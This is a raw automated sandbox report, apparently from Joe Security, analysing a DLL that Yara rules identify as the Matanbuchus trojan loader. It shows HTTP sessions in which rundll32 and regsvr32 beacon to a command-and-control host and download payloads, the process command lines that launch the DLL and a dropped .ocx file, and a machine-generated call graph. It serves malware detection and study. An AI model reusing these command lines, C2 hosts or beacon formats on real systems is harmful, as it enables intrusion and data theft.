                    Data Ascii: data=eyJDS3oiOiJ5SFhsIiwiRnN0TCI6InkwT2F1M2pTOVkzVGt3Mms5YWlQL1RFPSIsInZZdEIiOiI3VXYwIiwidm9KYyI6IitHLzluZz09Iiwid0FjSCI6InlHblpuQ0RNbWYvUW14RzUiLCJ4ZUNjalMiOiJ6MlRhbENJPSIsInlpaVVYWSI6InpUcnJxaVdSMDZDSjJHUGF5dXoxOTFaR1p6VXQrVWRacDQzaXRLUVIxNHM9In0=
                    Oct 6, 2024 13:27:39.156363964 CEST | 218 | IN | HTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:27:38 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    X-Powered-By: PHP/8.2.12
                    Content-Length: 20
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 56 58 59 77 49 6e 30 3d
                    Data Ascii: eyJUUGQiOiI3VXYwIn0=


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    7 | 192.168.2.7 | 49993 | 193.109.85.31 | 54801 | 7520 | C:\Windows\SysWOW64\rundll32.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Oct 6, 2024 13:27:38.440324068 CEST | 452 | OUT | POST /blueoceansite/templates/docs/index.php HTTP/1.1
                    User-Agent: Microsoft-WNS/10.0
                    Host: vilodeqa.com
                    Content-Length: 249
                    Content-Type: application/x-www-form-urlencoded
                    Accept-Language: fr-CA
                    Data Ascii: data=eyJDS3oiOiJ5SFhsIiwiRnN0TCI6InkwT2F1M2pTOVkzVGt3Mms5YWlQL1RFPSIsInZZdEIiOiI3VXYwIiwidm9KYyI6IitHLzluZz09Iiwid0FjSCI6InlHblpuQ0RNbWYvUW14RzUiLCJ4ZUNjalMiOiJ6MlRhbENJPSIsInlpaVVYWSI6InpUcnJxaVdSMDZDSjJHUGF5dXoxOTFaR1p6VXQrVWRacDQzaXRLUVIxNHM9In0=
                    Oct 6, 2024 13:27:39.246005058 CEST | 218 | IN | HTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:27:39 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    X-Powered-By: PHP/8.2.12
                    Content-Length: 20
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 56 58 59 77 49 6e 30 3d
                    Data Ascii: eyJUUGQiOiI3VXYwIn0=


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    8 | 192.168.2.7 | 49994 | 193.109.85.31 | 54801 | 7984 | C:\Windows\SysWOW64\regsvr32.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Oct 6, 2024 13:27:44.453346968 CEST | 452 | OUT | POST /blueoceansite/templates/docs/index.php HTTP/1.1
                    User-Agent: Microsoft-WNS/10.0
                    Host: vilodeqa.com
                    Content-Length: 249
                    Content-Type: application/x-www-form-urlencoded
                    Accept-Language: fr-CA
                    Data Ascii: data=eyJDS3oiOiJ5SFhsIiwiRnN0TCI6InkwT2F1M2pTOVkzVGt3Mms5YWlQL1RFPSIsInZZdEIiOiI3VXYwIiwidm9KYyI6IitHLzluZz09Iiwid0FjSCI6InlHblpuQ0RNbWYvUW14RzUiLCJ4ZUNjalMiOiIyM1BTanc9PSIsInlpaVVYWSI6InpUcnJxaVdSMDZDSjJHUGF5dXoxOTFaR1p6VXQ2VTVPdlpQaXRLUVIxNHM9In0=
                    Oct 6, 2024 13:27:45.268975019 CEST | 218 | IN | HTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:27:45 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    X-Powered-By: PHP/8.2.12
                    Content-Length: 20
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 56 58 59 77 49 6e 30 3d
                    Data Ascii: eyJUUGQiOiI3VXYwIn0=


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.7 | 49699 | 193.109.85.27 | 443 | 7404 | C:\Windows\SysWOW64\rundll32.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2024-10-06 11:25:12 UTC | 106 | OUT | GET /account.aspx HTTP/1.1
                    User-Agent: Microsoft-WNS/11.0
                    Host: semurox.com
                    Cache-Control: no-cache
                    2024-10-06 11:25:12 UTC | 252 | IN | HTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:25:12 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    Last-Modified: Sun, 06 Oct 2024 10:46:51 GMT
                    ETag: "87000-623cc9f2d1769"
                    Accept-Ranges: bytes
                    Content-Length: 552960
                    Connection: close


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.749701193.109.85.314437404C:\Windows\SysWOW64\rundll32.exe
                    Timestamp  Bytes transferred  Direction  Data
                    2024-10-06 11:25:16 UTC  107  OUT  GET /detalis.aspx HTTP/1.1
                    User-Agent: Microsoft-WNS/11.0
                    Host: vilodeqa.com
                    Cache-Control: no-cache
                    2024-10-06 11:25:16 UTC  254  IN  HTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:25:16 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    Last-Modified: Sat, 05 Oct 2024 05:36:27 GMT
                    ETag: "14cc02-623b42b499466"
                    Accept-Ranges: bytes
                    Content-Length: 1362946
                    Connection: close


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.749702193.109.85.314437520C:\Windows\SysWOW64\rundll32.exe
                    Timestamp  Bytes transferred  Direction  Data
                    2024-10-06 11:25:16 UTC  107  OUT  GET /detalis.aspx HTTP/1.1
                    User-Agent: Microsoft-WNS/11.0
                    Host: vilodeqa.com
                    Cache-Control: no-cache
                    2024-10-06 11:25:16 UTC  254  IN  HTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:25:16 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    Last-Modified: Sat, 05 Oct 2024 05:36:27 GMT
                    ETag: "14cc02-623b42b499466"
                    Accept-Ranges: bytes
                    Content-Length: 1362946
                    Connection: close


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.749710193.109.85.314437984C:\Windows\SysWOW64\regsvr32.exe
                    Timestamp  Bytes transferred  Direction  Data
                    2024-10-06 11:25:18 UTC  107  OUT  GET /detalis.aspx HTTP/1.1
                    User-Agent: Microsoft-WNS/11.0
                    Host: vilodeqa.com
                    Cache-Control: no-cache
                    2024-10-06 11:25:18 UTC  254  IN  HTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:25:18 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    Last-Modified: Sat, 05 Oct 2024 05:36:27 GMT
                    ETag: "14cc02-623b42b499466"
                    Accept-Ranges: bytes
                    Content-Length: 1362946
                    Connection: close
                    Data Ascii: YjyPs2gjcW6y7TNMbeACve9zU70fksCvMKlLQav+//oP5afJgUfGDJu5dj7TK7/BIJ/GDLO5ZsrTO7vBKJvGBJ+5fs6db0tKbWvEFJ/1cTJabktK5i5Hym+7ftrRO6fDOIPCBI+7durRI0PBfOBNyCLWuHu+5waq4D6vyDLquHOG5UMb5j6XymViuHumhnWpk5TEBJu51muYakuGoaeDjTK537W2esIHkeAKve53x70XmsIHleAauaA
                    2024-10-06 11:25:19 UTC16384INData Raw: 38 77 5a 4b 77 4b 68 57 59 79 4d 7a 61 78 61 59 77 50 71 57 74 50 51 57 65 34 64 76 4b 7a 52 55 70 4b 62 59 4a 72 51 47 63 79 73 30 75 70 61 44 34 4c 0d 0a 37 52 61 39 52 68 49 4a 75 48 74 53 35 51 70 43 35 6a 70 44 79 71 2f 61 53 56 70 53 62 73 41 48 59 51 31 41 62 79 59 36 72 4d 43 65 4b 6a 46 44 71 69 36 50 51 47 63 79 4d 39 31 64 71 51 36 4b 0d 0a 62 57 74 50 51 65 31 33 38 39 2b 2b 62 6b 74 4b 68 4c 5a 50 51 57 65 79 54 73 56 64 47 77 6a 4b 45 4a 6c 4a 4e 46 71 35 5a 6a 72 52 4a 45 50 42 50 32 65 6e 64 41 73 36 4d 37 30 66 5a 72 6c 46 0d 0a 66 53 4e 48 4a 32 67 63 2b 36 6d 73 71 67 38 77 5a 4b 77 4b 2f 57 59 79 4d 7a 61 78 61 59 77 50 30 57 74 50 51 57 65 34 64 6f 71 7a 39 55 74 4b 62 59 4c 62 51 57 63 79 73 30 75 70 61 44 34 50 0d 0a 37 52 61 39 52
                    Data Ascii: 8wZKwKhWYyMzaxaYwPqWtPQWe4dvKzRUpKbYJrQGcys0upaD4L7Ra9RhIJuHtS5QpC5jpDyq/aSVpSbsAHYQ1AbyY6rMCeKjFDqi6PQGcyM91dqQ6KbWtPQe1389++bktKhLZPQWeyTsVdGwjKEJlJNFq5ZjrRJEPBP2endAs6M70fZrlFfSNHJ2gc+6msqg8wZKwK/WYyMzaxaYwP0WtPQWe4doqz9UtKbYLbQWcys0upaD4P7Ra9R


                    Target ID:0
                    Start time:07:25:02
                    Start date:06/10/2024
                    Path:C:\Windows\System32\loaddll32.exe
                    Wow64 process (32bit):true
                    Commandline:loaddll32.exe "C:\Users\user\Desktop\file.dll"
                    Imagebase:0xce0000
                    File size:126'464 bytes
                    MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:1
                    Start time:07:25:03
                    Start date:06/10/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff75da10000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:2
                    Start time:07:25:03
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
                    Imagebase:0x410000
                    File size:236'544 bytes
                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:3
                    Start time:07:25:03
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe C:\Users\user\Desktop\file.dll,CheckLicense
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:4
                    Start time:07:25:03
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",#1
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:12
                    Start time:07:25:06
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe C:\Users\user\Desktop\file.dll,DllInit
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:14
                    Start time:07:25:09
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe C:\Users\user\Desktop\file.dll,DllInstall
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 0000000E.00000002.3111806010.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000E.00000002.3111806010.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    Target ID:16
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",CheckLicense
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:17
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",DllInit
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:18
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",DllInstall
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000012.00000002.3113049716.000000006D051000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                    • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    Target ID:19
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_setopt
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:20
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_perform
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:21
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_init
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:22
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_cleanup
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000016.00000002.1885875877.000000006D051000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                    Has exited:true

                    Target ID:23
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",Uninitialize
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:24
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",ThreadFunction
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:25
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",Main
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:27
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",InitDll
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:28
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",Init
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:29
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",DllUninitialize
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:31
                    Start time:07:25:13
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\WerFault.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 608
                    Imagebase:0xc10000
                    File size:483'680 bytes
                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:33
                    Start time:07:25:15
                    Start date:06/10/2024
                    Path:C:\Windows\System32\regsvr32.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
                    Imagebase:0x7ff66b4e0000
                    File size:25'088 bytes
                    MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:false

                    Target ID:34
                    Start time:07:25:15
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\regsvr32.exe
                    Wow64 process (32bit):true
                    Commandline: -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
                    Imagebase:0xe60000
                    File size:20'992 bytes
                    MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000022.00000002.3112823931.000000006B811000.00000020.00000001.01000000.00000008.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    Has exited:false

                    Target ID:36
                    Start time:09:14:27
                    Start date:06/10/2024
                    Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                    Imagebase:0x7ff6b56d0000
                    File size:468'120 bytes
                    MD5 hash:B3676839B2EE96983F9ED735CD044159
                    Has elevated privileges:true
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:37
                    Start time:09:14:27
                    Start date:06/10/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff75da10000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true


                      Execution Graph

                      Execution Coverage:3.9%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:50.8%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:57
61622->61628 61630 7f3b0dd0 111 API calls 61623->61630 61631 7f3345e0 53 API calls 61624->61631 61635 7f3463a0 std::ios_base::clear 32 API calls 61627->61635 61629 7f3753d3 61628->61629 61636 7f3463a0 std::ios_base::clear 32 API calls 61629->61636 61637 7f375138 61630->61637 61638 7f376141 61631->61638 61639 7f375e85 61632->61639 61633 7f375ba4 61647 7f3345e0 53 API calls 61633->61647 61634 7f375902 61640 7f3463a0 std::ios_base::clear 32 API calls 61634->61640 61641 7f375689 61635->61641 61643 7f3753f4 61636->61643 62376 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61637->62376 61645 7f3342d0 53 API calls 61638->61645 62393 7f334770 32 API calls 61639->62393 61648 7f375923 61640->61648 61642 7f3463a0 std::ios_base::clear 32 API calls 61641->61642 61649 7f3756aa 61642->61649 61650 7f3463a0 std::ios_base::clear 32 API calls 61643->61650 61651 7f376147 61645->61651 61652 7f375be8 61647->61652 61653 7f3463a0 std::ios_base::clear 32 API calls 61648->61653 61655 7f3ac670 53 API calls 61649->61655 61656 7f375415 61650->61656 61662 7f3345e0 53 API calls 61651->61662 61792 7f3762da 61651->61792 62391 7f334770 32 API calls 61652->62391 61654 7f375955 61653->61654 61658 7f3463a0 std::ios_base::clear 32 API calls 61654->61658 61659 7f3756c0 61655->61659 61660 7f3b0dd0 111 API calls 61656->61660 61665 7f375976 61658->61665 61666 7f3463a0 std::ios_base::clear 32 API calls 61659->61666 61667 7f375425 61660->61667 61661 7f3345e0 53 API calls 61668 7f37642e 61661->61668 61669 7f376172 61662->61669 61663 7f375bef 61664 7f3463a0 std::ios_base::clear 32 API calls 61663->61664 61671 7f375c10 61664->61671 61672 7f3463a0 std::ios_base::clear 32 API calls 61665->61672 61673 7f3756e1 61666->61673 62380 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61667->62380 61675 7f3342d0 53 API calls 61668->61675 62396 7f334770 32 API calls 61669->62396 61670 7f375e8c 61677 7f3345e0 53 API calls 61670->61677 61679 
7f3463a0 std::ios_base::clear 32 API calls 61671->61679 61680 7f375997 61672->61680 61681 7f3463a0 std::ios_base::clear 32 API calls 61673->61681 61682 7f376434 61675->61682 61678 7f375ed5 61677->61678 62394 7f334770 32 API calls 61678->62394 61684 7f375c42 61679->61684 61685 7f3ac670 53 API calls 61680->61685 61686 7f375702 61681->61686 61691 7f3345e0 53 API calls 61682->61691 61801 7f3765d0 61682->61801 61688 7f3463a0 std::ios_base::clear 32 API calls 61684->61688 61689 7f3759ad 61685->61689 61690 7f3b0dd0 111 API calls 61686->61690 61687 7f375edc 61694 7f3463a0 std::ios_base::clear 32 API calls 61687->61694 61695 7f375c63 61688->61695 61696 7f3463a0 std::ios_base::clear 32 API calls 61689->61696 61697 7f375712 61690->61697 61698 7f37645a 61691->61698 61693 7f376179 61702 7f3345e0 53 API calls 61693->61702 61703 7f375efd 61694->61703 61704 7f3463a0 std::ios_base::clear 32 API calls 61695->61704 61705 7f3759ce 61696->61705 62384 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61697->62384 62399 7f334770 32 API calls 61698->62399 61709 7f3761c2 61702->61709 61710 7f3463a0 std::ios_base::clear 32 API calls 61703->61710 61711 7f375c84 61704->61711 61712 7f3463a0 std::ios_base::clear 32 API calls 61705->61712 61707 7f376461 62400 7f3492e0 30 API calls std::ios_base::clear 61707->62400 62397 7f334770 32 API calls 61709->62397 61715 7f375f2f 61710->61715 61716 7f3ac670 53 API calls 61711->61716 61717 7f3759ef 61712->61717 61713 7f3463a0 std::ios_base::clear 32 API calls 61718 7f376788 61713->61718 61720 7f3463a0 std::ios_base::clear 32 API calls 61715->61720 61721 7f375c9a 61716->61721 61722 7f3b0dd0 111 API calls 61717->61722 61724 7f3463a0 std::ios_base::clear 32 API calls 61718->61724 61719 7f3761c9 61725 7f3463a0 std::ios_base::clear 32 API calls 61719->61725 61726 7f375f50 61720->61726 61727 7f3463a0 std::ios_base::clear 32 API calls 61721->61727 61728 7f3759ff 61722->61728 61730 7f3767a9 61724->61730 61731 7f3761ea 
